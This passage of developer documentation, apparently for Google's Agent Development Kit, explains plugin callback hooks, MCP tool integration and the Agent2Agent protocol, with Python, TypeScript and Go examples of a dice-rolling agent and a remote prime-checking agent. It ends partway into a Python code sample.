const session = await runner.sessionService.createSession({ userId: "user", appName: "test_app_with_plugin", }); // runAsync returns an async iterable stream in TypeScript const runStream = runner.runAsync({ userId: "user", sessionId: session.id, newMessage: { role: "user", parts: [{ text: prompt }], }, }); // Use 'for await...of' to loop through the async stream for await (const event of runStream) { console.log(`** Got event from ${event.author}`); } } main(); ```

### Run the agent with the Plugin

Run the agent as you typically would. The following commands show how to run it from the command line:

```sh
python3 -m path.to.main
```

```sh
npx ts-node path/to/main.ts
```

The output of the agent described previously should look similar to the following:

```text
[Plugin] Agent run count: 1
[Plugin] LLM request count: 1
** Got event from hello_world
Hello world: query is [hello world]
** Got event from hello_world
[Plugin] LLM request count: 2
** Got event from hello_world
```

For more information on running ADK agents, see the [Quickstart](/adk-docs/get-started/quickstart/#run-your-agent) guide.

## Build workflows with Plugins

Plugin callback hooks are a mechanism for implementing logic that intercepts, modifies, and even controls the agent's execution lifecycle. Each hook is a specific method in your Plugin class that you can implement to run code at a key moment. You have a choice between three modes of operation, based on what your hook returns or modifies:

- **To Observe:** Implement a hook with no return value (`None`). This approach is for tasks such as logging or collecting metrics, as it allows the agent's workflow to proceed to the next step without interruption. For example, you could use `after_tool_callback` in a Plugin to log every tool's result for debugging.
- **To Intervene:** Implement a hook and return a value. This approach short-circuits the workflow.
The `Runner` halts processing, skips any subsequent plugins and the original intended action, such as a Model call, and uses the Plugin callback's return value as the result. A common use case is implementing `before_model_callback` to return a cached `LlmResponse`, preventing a redundant and costly API call.
- **To Amend:** Implement a hook and modify the Context object. This approach allows you to modify the context data for the module to be executed without otherwise interrupting the execution of that module. For example, you could add standardized prompt text before a Model object executes.

**Caution:** Plugin callback functions take precedence over callbacks implemented at the object level. This means that Plugin callback code is executed *before* any Agent, Model, or Tool object callbacks are executed. Furthermore, if a Plugin-level callback returns any value other than an empty (`None`) response, the corresponding Agent-, Model-, or Tool-level callback is *not executed* (skipped).

The Plugin design establishes a hierarchy of code execution and separates global concerns from local agent logic. A Plugin is the stateful *module* you build, such as `PerformanceMonitoringPlugin`, while the callback hooks are the specific *functions* within that module that get executed. This architecture differs from standard Agent Callbacks in two critical ways:

- **Scope:** Plugin hooks are *global*. You register a Plugin once on the `Runner`, and its hooks apply universally to every Agent, Model, and Tool it manages. In contrast, Agent Callbacks are *local*, configured individually on a specific agent instance.
- **Execution Order:** Plugins have *precedence*. For any given event, the Plugin hooks always run before any corresponding Agent Callback.

This system behavior makes Plugins the correct architectural choice for implementing cross-cutting features like security policies, universal caching, and consistent logging across your entire application.
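The three modes and the precedence rule described above can be sketched with a toy dispatcher in plain Python. This is a minimal illustration under stated assumptions, not ADK's implementation: `run_model_step`, the hook functions, and the dictionary-based request are all hypothetical stand-ins for the `Runner`, Plugin callbacks, and `LlmRequest`.

```python
import asyncio
from typing import Awaitable, Callable, Optional

# Hypothetical stand-ins (not ADK types): a request is a plain dict, and a
# hook returns None to let the flow continue or a string to replace the result.
Hook = Callable[[dict], Awaitable[Optional[str]]]

CACHE = {"ping": "pong (cached)"}
calls: list = []  # records which hooks ran, in order


async def run_model_step(
    request: dict,
    plugin_hooks: list,
    agent_hook: Optional[Hook],
    call_model: Callable[[dict], Awaitable[str]],
) -> str:
    """Toy dispatcher: plugin hooks first, then the agent hook, then the model."""
    for hook in plugin_hooks:
        result = await hook(request)
        if result is not None:
            # Intervene: skip remaining plugins, the agent hook, and the model.
            return result
    if agent_hook is not None:
        result = await agent_hook(request)
        if result is not None:
            return result
    return await call_model(request)


async def log_hook(request: dict) -> Optional[str]:
    calls.append("log")  # Observe: side effect only, returns None
    return None


async def amend_hook(request: dict) -> Optional[str]:
    request["prompt"] = request["prompt"].strip().lower()  # Amend: edit in place
    calls.append("amend")
    return None


async def cache_hook(request: dict) -> Optional[str]:
    calls.append("cache")
    return CACHE.get(request["prompt"])  # Intervene only on a cache hit


async def agent_hook(request: dict) -> Optional[str]:
    calls.append("agent")
    return None


async def call_model(request: dict) -> str:
    calls.append("model")
    return f"model answer to {request['prompt']!r}"


def demo() -> tuple:
    """Run one cache hit and one cache miss and return both results."""
    calls.clear()
    plugins = [log_hook, amend_hook, cache_hook]
    hit = asyncio.run(run_model_step({"prompt": " PING "}, plugins, agent_hook, call_model))
    miss = asyncio.run(run_model_step({"prompt": "Hello"}, plugins, agent_hook, call_model))
    return hit, miss, list(calls)


if __name__ == "__main__":
    print(demo())
```

On the cache hit, the agent hook and the model call never run; on the miss, every hook returns `None` and the flow reaches the model with the amended prompt.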
### Agent Callbacks and Plugins

As mentioned in the previous section, there are some functional similarities between Plugins and Agent Callbacks. The following table compares Plugins and Agent Callbacks in more detail.

| | **Plugins** | **Agent Callbacks** |
| -------------------- | --------------------------------------------------------------------- | ---------------------------------------------------------------------------- |
| **Scope** | **Global**: Apply to all agents/tools/LLMs in the `Runner`. | **Local**: Apply only to the specific agent instance they are configured on. |
| **Primary Use Case** | **Horizontal Features**: Logging, policy, monitoring, global caching. | **Specific Agent Logic**: Modifying the behavior or state of a single agent. |
| **Configuration** | Configure once on the `Runner`. | Configure individually on each `BaseAgent` instance. |
| **Execution Order** | Plugin callbacks run **before** Agent Callbacks. | Agent callbacks run **after** Plugin callbacks. |

## Plugin callback hooks

You define when a Plugin is called by choosing which callback functions to implement in your Plugin class. Callbacks are available when a user message is received, before and after a `Runner`, `Agent`, `Model`, or `Tool` is called, for `Events`, and when a `Model` or `Tool` error occurs. These callbacks run in addition to, and take precedence over, any callbacks defined within your Agent, Model, and Tool classes.

The following diagram illustrates callback points where you can attach and run Plugin functionality during your agent's workflow:

**Figure 1.** Diagram of ADK agent workflow with Plugin callback hook locations.

The following sections describe the available callback hooks for Plugins in more detail.
- [User Message callbacks](#user-message-callbacks)
- [Runner start callbacks](#runner-start-callbacks)
- [Agent execution callbacks](#agent-execution-callbacks)
- [Model callbacks](#model-callbacks)
- [Tool callbacks](#tool-callbacks)
- [Event callbacks](#event-callbacks)
- [Runner end callbacks](#runner-end-callbacks)

### User Message callbacks

A *User Message* callback (`on_user_message_callback`) happens when a user sends a message. It is the very first hook to run, giving you a chance to inspect or modify the initial input.

- **When It Runs:** Immediately after `runner.run()` is called, before any other processing.
- **Purpose:** The first opportunity to inspect or modify the user's raw input.
- **Flow Control:** Return a `types.Content` object to **replace** the user's original message.

The following code example shows the basic syntax of this callback:

```py
async def on_user_message_callback(
    self,
    *,
    invocation_context: InvocationContext,
    user_message: types.Content,
) -> Optional[types.Content]:
```

```typescript
async onUserMessageCallback(
  invocationContext: InvocationContext,
  userMessage: Content
): Promise<Content | undefined> {
  // Your implementation here
}
```

### Runner start callbacks

A *Runner start* callback (`before_run_callback`) happens when the `Runner` object takes the potentially modified user message and prepares for execution. It allows for global setup before any agent logic begins.

- **When It Runs:** After `on_user_message_callback`, once the `Runner` has the potentially modified user message and before any agent logic begins.
- **Purpose:** Global setup or initialization that must happen before agents run.
- **Flow Control:** Return `None` to continue normally. Returning a `types.Content` object ends the run early and uses that content as the response.
The following code example shows the basic syntax of this callback:

```py
async def before_run_callback(
    self, *, invocation_context: InvocationContext
) -> Optional[types.Content]:
```

```typescript
async beforeRunCallback(invocationContext: InvocationContext): Promise<Content | undefined> {
  // Your implementation here
}
```

### Agent execution callbacks

*Agent execution* callbacks (`before_agent`, `after_agent`) happen when a `Runner` object invokes an agent. The `before_agent_callback` runs immediately before the agent's main work begins. The main work encompasses the agent's entire process for handling the request, which could involve calling models or tools. After the agent has finished all its steps and prepared a result, the `after_agent_callback` runs.

**Caution:** Plugins that implement these callbacks are executed *before* the Agent-level callbacks are executed. Furthermore, if a Plugin-level agent callback returns anything other than a `None` or null response, the Agent-level callback is *not executed* (skipped).

For more information about Agent callbacks defined as part of an Agent object, see [Types of Callbacks](https://google.github.io/adk-docs/callbacks/types-of-callbacks/#agent-lifecycle-callbacks).

### Model callbacks

Model callbacks (`before_model`, `after_model`, `on_model_error`) happen before and after a Model object executes. The Plugins feature also supports a callback in the event of an error, as detailed below:

- If an agent needs to call an AI model, `before_model_callback` runs first.
- If the model call is successful, `after_model_callback` runs next.
- If the model call fails with an exception, the `on_model_error_callback` is triggered instead, allowing for graceful recovery.

**Caution:** Plugins that implement the `before_model` and `after_model` callback methods are executed *before* the Model-level callbacks are executed.
Furthermore, if a Plugin-level model callback returns anything other than a `None` or null response, the Model-level callback is *not executed* (skipped).

#### Model on error callback details

The on error callback for Model objects is supported only by the Plugins feature and works as follows:

- **When It Runs:** When an exception is raised during the model call.
- **Common Use Cases:** Graceful error handling, logging the specific error, or returning a fallback response, such as "The AI service is currently unavailable."
- **Flow Control:**
  - Return an `LlmResponse` object to **suppress the exception** and provide a fallback result.
  - Return `None` to allow the original exception to be raised.

**Note**: If the callback returns an `LlmResponse`, the system resumes the execution flow, and `after_model_callback` is triggered normally.

The following code example shows the basic syntax of this callback:

```py
async def on_model_error_callback(
    self,
    *,
    callback_context: CallbackContext,
    llm_request: LlmRequest,
    error: Exception,
) -> Optional[LlmResponse]:
```

```typescript
async onModelErrorCallback(
  callbackContext: CallbackContext,
  llmRequest: LlmRequest,
  error: Error
): Promise<LlmResponse | undefined> {
  // Your implementation here
}
```

### Tool callbacks

Tool callbacks (`before_tool`, `after_tool`, `on_tool_error`) for Plugins happen before or after the execution of a tool, or when an error occurs. The Plugins feature also supports a callback in the event of an error, as detailed below:

- When an agent executes a Tool, `before_tool_callback` runs first.
- If the tool executes successfully, `after_tool_callback` runs next.
- If the tool raises an exception, the `on_tool_error_callback` is triggered instead, giving you a chance to handle the failure. If `on_tool_error_callback` returns a dict, `after_tool_callback` is triggered normally.

**Caution:** Plugins that implement these callbacks are executed *before* the Tool-level callbacks are executed.
Furthermore, if a Plugin-level tool callback returns anything other than a `None` or null response, the Tool-level callback is *not executed* (skipped).

#### Tool on error callback details

The on error callback for Tool objects is supported only by the Plugins feature and works as follows:

- **When It Runs:** When an exception is raised during the execution of a tool's `run` method.
- **Purpose:** Catching specific tool exceptions (like `APIError`), logging the failure, and providing a user-friendly error message back to the LLM.
- **Flow Control:** Return a `dict` to **suppress the exception** and provide a fallback result. Return `None` to allow the original exception to be raised.

**Note**: Returning a `dict` resumes the execution flow, and `after_tool_callback` is triggered normally.

The following code example shows the basic syntax of this callback:

```py
async def on_tool_error_callback(
    self,
    *,
    tool: BaseTool,
    tool_args: dict[str, Any],
    tool_context: ToolContext,
    error: Exception,
) -> Optional[dict]:
```

```typescript
async onToolErrorCallback(
  tool: BaseTool,
  toolArgs: { [key: string]: any },
  toolContext: ToolContext,
  error: Error
): Promise<{ [key: string]: any } | undefined> {
  // Your implementation here
}
```

### Event callbacks

An *Event* callback (`on_event_callback`) happens when an agent produces output, such as a text response or a tool call result, and yields it as an `Event` object. The callback fires for each event, allowing you to modify it before it is streamed to the client.

- **When It Runs:** After an agent yields an `Event` but before it's sent to the user. An agent's run may produce multiple events.
- **Purpose:** Useful for modifying or enriching events (e.g., adding metadata) or for triggering side effects based on specific events.
- **Flow Control:** Return an `Event` object to **replace** the original event.
The following code example shows the basic syntax of this callback:

```py
async def on_event_callback(
    self, *, invocation_context: InvocationContext, event: Event
) -> Optional[Event]:
```

```typescript
async onEventCallback(
  invocationContext: InvocationContext,
  event: Event
): Promise<Event | undefined> {
  // Your implementation here
}
```

### Runner end callbacks

The *Runner end* callback (`after_run_callback`) happens after the agent has finished its entire process and all events have been handled, when the `Runner` completes its run. It is the final hook, suited to cleanup and final reporting.

- **When It Runs:** After the `Runner` fully completes the execution of a request.
- **Purpose:** Ideal for global cleanup tasks, such as closing connections or finalizing logs and metrics data.
- **Flow Control:** This callback is for teardown only and cannot alter the final result.

The following code example shows the basic syntax of this callback:

```py
async def after_run_callback(
    self, *, invocation_context: InvocationContext
) -> None:
```

```typescript
async afterRunCallback(invocationContext: InvocationContext): Promise<void> {
  // Your implementation here
}
```

## Next steps

Check out these resources for developing and applying Plugins to your ADK projects:

- For more ADK Plugin code examples, see the [ADK Python repository](https://github.com/google/adk-python/tree/main/src/google/adk/plugins).
- For information on applying Plugins for security purposes, see [Callbacks and Plugins for Security Guardrails](/adk-docs/safety/#callbacks-and-plugins-for-security-guardrails).

# Model Context Protocol (MCP)

Supported in ADK: Python, TypeScript, Go, Java

The [Model Context Protocol (MCP)](https://modelcontextprotocol.io/introduction) is an open standard designed to standardize how Large Language Models (LLMs) like Gemini and Claude communicate with external applications, data sources, and tools.
Think of it as a universal connection mechanism that simplifies how LLMs obtain context, execute actions, and interact with various systems.

**MCP tools for ADK:** For a list of pre-built MCP tools for ADK, see [Tools and Integrations](/adk-docs/integrations/?topic=mcp).

## How does MCP work?

MCP follows a client-server architecture, defining how data (resources), interactive templates (prompts), and actionable functions (tools) are exposed by an MCP server and consumed by an MCP client (which could be an LLM host application or an AI agent).

## MCP Tools in ADK

ADK helps you both consume and expose MCP tools, whether you are building a tool that calls an MCP service or exposing an MCP server so that other developers or agents can interact with your tools.

See [Tools and Integrations](/adk-docs/integrations/) for pre-built MCP tools you can use in your agents. Refer to the [MCP Tools documentation](/adk-docs/tools-custom/mcp-tools/) for code samples and design patterns that help you use ADK together with MCP servers, including:

- **Using Existing MCP Servers within ADK**: An ADK agent can act as an MCP client and use tools provided by external MCP servers.
- **Exposing ADK Tools via an MCP Server**: How to build an MCP server that wraps ADK tools, making them accessible to any MCP client.

## ADK Agent and FastMCP server

ADK uses [FastMCP](https://github.com/jlowin/fastmcp) to handle all the complex MCP protocol details and server management, so you can focus on building great tools. FastMCP is designed to be high-level and Pythonic; in most cases, decorating a function is all you need.

Refer to the [MCP Tools](/adk-docs/tools-custom/mcp-tools/) documentation to learn how to use ADK together with a FastMCP server running on Cloud Run.
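To illustrate why decorating a function can be enough to expose it as a tool, here is a toy registry in plain Python. It is not FastMCP and does not speak the MCP protocol; `ToyToolRegistry` and its methods are hypothetical names, chosen only to show how a decorator can capture a function's name, docstring, and parameter annotations so that a server could list and call it.

```python
import inspect
from typing import Any, Callable


class ToyToolRegistry:
    """Hypothetical stand-in for a decorator-based tool server (not FastMCP)."""

    def __init__(self) -> None:
        self._tools: dict = {}

    def tool(self, func: Callable[..., Any]) -> Callable[..., Any]:
        """Register `func` under its own name and return it unchanged."""
        self._tools[func.__name__] = func
        return func

    def list_tools(self) -> list:
        """Describe each tool from its docstring and parameter annotations."""
        described = []
        for name, func in self._tools.items():
            params = {
                param_name: getattr(param.annotation, "__name__", str(param.annotation))
                for param_name, param in inspect.signature(func).parameters.items()
            }
            described.append(
                {
                    "name": name,
                    "description": inspect.getdoc(func) or "",
                    "parameters": params,
                }
            )
        return described

    def call_tool(self, name: str, arguments: dict) -> Any:
        """Look up a registered tool by name and call it with keyword arguments."""
        return self._tools[name](**arguments)


registry = ToyToolRegistry()


@registry.tool
def add(a: int, b: int) -> int:
    """Add two integers."""
    return a + b


if __name__ == "__main__":
    print(registry.list_tools())
    print(registry.call_tool("add", {"a": 2, "b": 3}))
```

A real MCP server additionally handles transport, schema generation, and the protocol handshake; see the MCP Tools documentation linked above for working FastMCP samples.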
## MCP Servers for Google Cloud Genmedia

[MCP Tools for Genmedia Services](https://github.com/GoogleCloudPlatform/vertex-ai-creative-studio/tree/main/experiments/mcp-genmedia) is a set of open-source MCP servers that enable you to integrate Google Cloud generative media services, such as Imagen, Veo, Chirp 3 HD voices, and Lyria, into your AI applications.

Agent Development Kit (ADK) and [Genkit](https://genkit.dev/) provide built-in support for these MCP tools, allowing your AI agents to orchestrate generative media workflows. For implementation guidance, refer to the [ADK example agent](https://github.com/GoogleCloudPlatform/vertex-ai-creative-studio/tree/main/experiments/mcp-genmedia/sample-agents/adk) and the [Genkit example](https://github.com/GoogleCloudPlatform/vertex-ai-creative-studio/tree/main/experiments/mcp-genmedia/sample-agents/genkit).

# ADK with Agent2Agent (A2A) Protocol

Supported in ADK: Python, Go (Experimental)

With Agent Development Kit (ADK), you can build complex multi-agent systems in which different agents collaborate and interact using the [Agent2Agent (A2A) Protocol](https://a2a-protocol.org/). This section is a guide to building multi-agent systems where agents communicate and collaborate securely and efficiently.

Navigate through the guides below to learn about ADK's A2A capabilities:

**[Introduction to A2A](https://google.github.io/adk-docs/a2a/intro/index.md)**

Start here to learn the fundamentals of A2A by building a multi-agent system with a root agent, a local sub-agent, and a remote A2A agent.
The following guides cover how to expose your agent so that other agents can use it via the A2A protocol:

- **[A2A Quickstart (Exposing) for Python](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md)**
- **[A2A Quickstart (Exposing) for Go](https://google.github.io/adk-docs/a2a/quickstart-exposing-go/index.md)**

These guides show you how to allow your agent to use another, remote agent using the A2A protocol:

- **[A2A Quickstart (Consuming) for Python](https://google.github.io/adk-docs/a2a/quickstart-consuming/index.md)**
- **[A2A Quickstart (Consuming) for Go](https://google.github.io/adk-docs/a2a/quickstart-consuming-go/index.md)**

[**Official Website for Agent2Agent (A2A) Protocol**](https://a2a-protocol.org/): The official website for the A2A Protocol.

# Introduction to A2A

As you build more complex agentic systems, you will find that a single agent is often not enough. You will want to create specialized agents that can collaborate to solve a problem. The [**Agent2Agent (A2A) Protocol**](https://a2a-protocol.org) is the standard that allows these agents to communicate with each other.

## When to Use A2A vs. Local Sub-Agents

- **Local Sub-Agents:** These are agents that run *within the same application process* as your main agent. They are like internal modules or libraries, used to organize your code into logical, reusable components. Communication between a main agent and its local sub-agents is very fast because it happens directly in memory, without network overhead.
- **Remote Agents (A2A):** These are independent agents that run as separate services, communicating over a network. A2A defines the standard protocol for this communication.

Consider using **A2A** when:

- The agent you need to talk to is a **separate, standalone service** (e.g., a specialized financial modeling agent).
- The agent is maintained by a **different team or organization**.
- You need to connect agents written in **different programming languages or agent frameworks**.
- You want to enforce a **strong, formal contract** (the A2A protocol) between your system's components. ### When to Use A2A: Concrete Examples - **Integrating with a Third-Party Service:** Your main agent needs to get real-time stock prices from an external financial data provider. This provider exposes its data through an A2A-compatible agent. - **Microservices Architecture:** You have a large system broken down into smaller, independent services (e.g., an Order Processing Agent, an Inventory Management Agent, a Shipping Agent). A2A is ideal for these services to communicate with each other across network boundaries. - **Cross-Language Communication:** Your core business logic is in a Python agent, but you have a legacy system or a specialized component written in Java that you want to integrate as an agent. A2A provides the standardized communication layer. - **Formal API Enforcement:** You are building a platform where different teams contribute agents, and you need a strict contract for how these agents interact to ensure compatibility and stability. ### When NOT to Use A2A: Concrete Examples (Prefer Local Sub-Agents) - **Internal Code Organization:** You are breaking down a complex task within a single agent into smaller, manageable functions or modules (e.g., a `DataValidator` sub-agent that cleans input data before processing). These are best handled as local sub-agents for performance and simplicity. - **Performance-Critical Internal Operations:** A sub-agent is responsible for a high-frequency, low-latency operation that is tightly coupled with the main agent's execution (e.g., a `RealTimeAnalytics` sub-agent that processes data streams within the same application). - **Shared Memory/Context:** When sub-agents need direct access to the main agent's internal state or shared memory for efficiency, A2A's network overhead and serialization/deserialization would be counterproductive. 
- **Simple Helper Functions:** For small, reusable pieces of logic that don't require independent deployment or complex state management, a simple function or class within the same agent is more appropriate than a separate A2A agent. ## The A2A Workflow in ADK: A Simplified View Agent Development Kit (ADK) simplifies the process of building and connecting agents using the A2A protocol. Here's a straightforward breakdown of how it works: 1. **Making an Agent Accessible (Exposing):** You start with an existing ADK agent that you want other agents to be able to interact with. The ADK provides a simple way to "expose" this agent, turning it into an **A2AServer**. This server acts as a public interface, allowing other agents to send requests to your agent over a network. Think of it like setting up a web server for your agent. 1. **Connecting to an Accessible Agent (Consuming):** In a separate agent (which could be running on the same machine or a different one), you'll use a special ADK component called `RemoteA2aAgent`. This `RemoteA2aAgent` acts as a client that knows how to communicate with the **A2AServer** you exposed earlier. It handles all the complexities of network communication, authentication, and data formatting behind the scenes. From your perspective as a developer, once you've set up this connection, interacting with the remote agent feels just like interacting with a local tool or function. The ADK abstracts away the network layer, making distributed agent systems as easy to work with as local ones. ## Visualizing the A2A Workflow To further clarify the A2A workflow, let's look at the "before and after" for both exposing and consuming agents, and then the combined system. ### Exposing an Agent **Before Exposing:** Your agent code runs as a standalone component, but in this scenario, you want to expose it so that other remote agents can interact with your agent. 
```text +-------------------+ | Your Agent Code | | (Standalone) | +-------------------+ ``` **After Exposing:** Your agent code is integrated with an `A2AServer` (an ADK component), making it accessible over a network to other remote agents. ```text +-----------------+ | A2A Server | | (ADK Component) |<--------+ +-----------------+ | | | v | +-------------------+ | | Your Agent Code | | | (Now Accessible) | | +-------------------+ | | | (Network Communication) v +-----------------------------+ | Remote Agent(s) | | (Can now communicate) | +-----------------------------+ ``` ### Consuming an Agent **Before Consuming:** Your agent (referred to as the "Root Agent" in this context) is the application you are developing that needs to interact with a remote agent. Before consuming, it lacks the direct mechanism to do so. ```text +----------------------+ +-------------------------------------------------------------+ | Root Agent | | Remote Agent | | (Your existing code) | | (External Service that you want your Root Agent to talk to) | +----------------------+ +-------------------------------------------------------------+ ``` **After Consuming:** Your Root Agent uses a `RemoteA2aAgent` (an ADK component that acts as a client-side proxy for the remote agent) to establish communication with the remote agent. ```text +----------------------+ +-----------------------------------+ | Root Agent | | RemoteA2aAgent | | (Your existing code) |<------->| (ADK Client Proxy) | +----------------------+ | | | +-----------------------------+ | | | Remote Agent | | | | (External Service) | | | +-----------------------------+ | +-----------------------------------+ (Now talks to remote agent via RemoteA2aAgent) ``` ### Final System (Combined View) This diagram shows how the consuming and exposing parts connect to form a complete A2A system. 
```text Consuming Side: +----------------------+ +-----------------------------------+ | Root Agent | | RemoteA2aAgent | | (Your existing code) |<------->| (ADK Client Proxy) | +----------------------+ | | | +-----------------------------+ | | | Remote Agent | | | | (External Service) | | | +-----------------------------+ | +-----------------------------------+ | | (Network Communication) v Exposing Side: +-----------------+ | A2A Server | | (ADK Component) | +-----------------+ | v +-------------------+ | Your Agent Code | | (Exposed Service) | +-------------------+ ``` ## Concrete Use Case: Customer Service and Product Catalog Agents Let's consider a practical example: a **Customer Service Agent** that needs to retrieve product information from a separate **Product Catalog Agent**. ### Before A2A Initially, your Customer Service Agent might not have a direct, standardized way to query the Product Catalog Agent, especially if it's a separate service or managed by a different team. ```text +-------------------------+ +--------------------------+ | Customer Service Agent | | Product Catalog Agent | | (Needs Product Info) | | (Contains Product Data) | +-------------------------+ +--------------------------+ (No direct, standardized communication) ``` ### After A2A By using the A2A Protocol, the Product Catalog Agent can expose its functionality as an A2A service. Your Customer Service Agent can then easily consume this service using ADK's `RemoteA2aAgent`. 
```text +-------------------------+ +-----------------------------------+ | Customer Service Agent | | RemoteA2aAgent | | (Your Root Agent) |<------->| (ADK Client Proxy) | +-------------------------+ | | | +-----------------------------+ | | | Product Catalog Agent | | | | (External Service) | | | +-----------------------------+ | +-----------------------------------+ | | (Network Communication) v +-----------------+ | A2A Server | | (ADK Component) | +-----------------+ | v +------------------------+ | Product Catalog Agent | | (Exposed Service) | +------------------------+ ``` In this setup, first, the Product Catalog Agent needs to be exposed via an A2A Server. Then, the Customer Service Agent can simply call methods on the `RemoteA2aAgent` as if it were a tool, and the ADK handles all the underlying communication to the Product Catalog Agent. This allows for clear separation of concerns and easy integration of specialized agents. ## Next Steps Now that you understand the "why" of A2A, let's dive into the "how." - **Continue to the next guide:** [Quickstart: Exposing Your Agent](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md) # Quickstart: Consuming a remote agent via A2A Supported in ADKGoExperimental This quickstart covers the most common starting point for any developer: **"There is a remote agent, how do I let my ADK agent use it via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates the **Agent-to-Agent (A2A)** architecture in the Agent Development Kit (ADK), showcasing how multiple agents can work together to handle complex tasks. The sample implements an agent that can roll dice and check if numbers are prime. 
```text ┌─────────────────┐ ┌──────────────────┐ ┌────────────────────┐ │ Root Agent │───▶│ Roll Agent │ │ Remote Prime │ │ (Local) │ │ (Local) │ │ Agent │ │ │ │ │ │ (localhost:8001) │ │ │───▶│ │◀───│ │ └─────────────────┘ └──────────────────┘ └────────────────────┘ ``` The A2A Basic sample consists of: - **Root Agent** (`root_agent`): The main orchestrator that delegates tasks to specialized sub-agents - **Roll Agent** (`roll_agent`): A local sub-agent that handles dice rolling operations - **Prime Agent** (`prime_agent`): A remote A2A agent that checks if numbers are prime, this agent is running on a separate A2A server ## Exposing Your Agent with the ADK Server In the `a2a_basic` example, you will first need to expose the `check_prime_agent` via an A2A server, so that the local root agent can use it. ### 1. Getting the Sample Code First, make sure you have Go installed and your environment is set up. You can clone and navigate to the [**`a2a_basic`** sample](https://github.com/google/adk-docs/tree/main/examples/go/a2a_basic) here: ```bash cd examples/go/a2a_basic ``` As you'll see, the folder structure is as follows: ```text a2a_basic/ ├── remote_a2a/ │ └── check_prime_agent/ │ └── main.go ├── go.mod ├── go.sum └── main.go # local root agent ``` #### Main Agent (`a2a_basic/main.go`) - **`rollDieTool`**: Function tool for rolling dice - **`newRollAgent`**: Local agent specialized in dice rolling - **`newPrimeAgent`**: Remote A2A agent configuration - **`newRootAgent`**: Main orchestrator with delegation logic #### Remote Prime Agent (`a2a_basic/remote_a2a/check_prime_agent/main.go`) - **`checkPrimeTool`**: Prime number checking algorithm - **`main`**: Implementation of the prime checking service and A2A server. ### 2. Start the Remote Prime Agent server To show how your ADK agent can consume a remote agent via A2A, you'll first need to start a remote agent server, which will host the prime agent (under `check_prime_agent`). 
```bash
# Start the remote a2a server that serves the check_prime_agent on port 8001
go run remote_a2a/check_prime_agent/main.go
```

Once executed, you should see something like:

```shell
2025/11/06 11:00:19 Starting A2A prime checker server on port 8001
2025/11/06 11:00:19 Starting the web server: &{port:8001}
2025/11/06 11:00:19
2025/11/06 11:00:19 Web servers starts on http://localhost:8001
2025/11/06 11:00:19 a2a: you can access A2A using jsonrpc protocol: http://localhost:8001
```

### 3. Look out for the required agent card of the remote agent

The A2A Protocol requires each agent to have an agent card that describes what it does. In the Go ADK, the agent card is generated dynamically when you expose an agent using the A2A launcher. You can visit `http://localhost:8001/.well-known/agent-card.json` to see the generated card.

### 4. Run the Main (Consuming) Agent

```bash
# In a separate terminal, run the main agent
go run main.go
```

#### How it works

The main agent uses `remoteagent.NewA2A` to consume the remote agent (`prime_agent` in our example). As you can see below, it requires the `Name`, `Description`, and the `AgentCardSource` URL.

a2a_basic/main.go

```go
func newPrimeAgent() (agent.Agent, error) {
	remoteAgent, err := remoteagent.NewA2A(remoteagent.A2AConfig{
		Name:            "prime_agent",
		Description:     "Agent that handles checking if numbers are prime.",
		AgentCardSource: "http://localhost:8001",
	})
	if err != nil {
		return nil, fmt.Errorf("failed to create remote prime agent: %w", err)
	}
	return remoteAgent, nil
}
```

Then, you can simply use the remote agent in your root agent.
In this case, `primeAgent` is used as one of the sub-agents in the `root_agent` below: a2a_basic/main.go ```go func newRootAgent(ctx context.Context, rollAgent, primeAgent agent.Agent) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "root_agent", Model: model, Instruction: ` You are a helpful assistant that can roll dice and check if numbers are prime. You delegate rolling dice tasks to the roll_agent and prime checking tasks to the prime_agent. Follow these steps: 1. If the user asks to roll a die, delegate to the roll_agent. 2. If the user asks to check primes, delegate to the prime_agent. 3. If the user asks to roll a die and then check if the result is prime, call roll_agent first, then pass the result to prime_agent. Always clarify the results before proceeding. `, SubAgents: []agent.Agent{rollAgent, primeAgent}, Tools: []tool.Tool{}, }) } ``` ## Example Interactions Once both your main and remote agents are running, you can interact with the root agent to see how it calls the remote agent via A2A: **Simple Dice Rolling:** This interaction uses a local agent, the Roll Agent: ```text User: Roll a 6-sided die Bot calls tool: transfer_to_agent with args: map[agent_name:roll_agent] Bot calls tool: roll_die with args: map[sides:6] Bot: I rolled a 6-sided die and the result is 6. ``` **Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent: ```text User: Is 7 a prime number? Bot calls tool: transfer_to_agent with args: map[agent_name:prime_agent] Bot calls tool: prime_checking with args: map[nums:[7]] Bot: Yes, 7 is a prime number. ``` **Combined Operations:** This interaction uses both the local Roll Agent and the remote Prime Agent: ```text User: roll a die and check if it's a prime Bot: Okay, I will first roll a die and then check if the result is a prime number. 
Bot calls tool: transfer_to_agent with args: map[agent_name:roll_agent] Bot calls tool: roll_die with args: map[sides:6] Bot calls tool: transfer_to_agent with args: map[agent_name:prime_agent] Bot calls tool: prime_checking with args: map[nums:[3]] Bot: 3 is a prime number. ``` ## Next Steps Now that you have created an agent that's using a remote agent via an A2A server, the next step is to learn how to expose your own agent. - [**A2A Quickstart (Exposing)**](https://google.github.io/adk-docs/a2a/quickstart-exposing-go/index.md): Learn how to expose your existing agent so that other agents can use it via the A2A Protocol. # Quickstart: Consuming a remote agent via A2A Supported in ADKPythonExperimental This quickstart covers the most common starting point for any developer: **"There is a remote agent, how do I let my ADK agent use it via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates the **Agent2Agent (A2A)** architecture in the Agent Development Kit (ADK), showcasing how multiple agents can work together to handle complex tasks. The sample implements an agent that can roll dice and check if numbers are prime. 
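To make the two capabilities concrete, here is a framework-free sketch of a dice roller and a prime checker. It is not the sample's actual implementation: the function bodies, the helper `is_prime`, and the returned message strings are assumptions chosen for illustration, and no ADK APIs are involved.

```python
import random


def roll_die(sides: int) -> int:
    """Return a random integer between 1 and `sides`, inclusive."""
    return random.randint(1, sides)


def is_prime(n: int) -> bool:
    """Trial division up to the square root of n (hypothetical helper)."""
    if n < 2:
        return False
    divisor = 2
    while divisor * divisor <= n:
        if n % divisor == 0:
            return False
        divisor += 1
    return True


def check_prime(nums: list[int]) -> str:
    """Return a message naming which of the given numbers are prime."""
    primes = [n for n in nums if is_prime(n)]
    if not primes:
        return "No prime numbers found."
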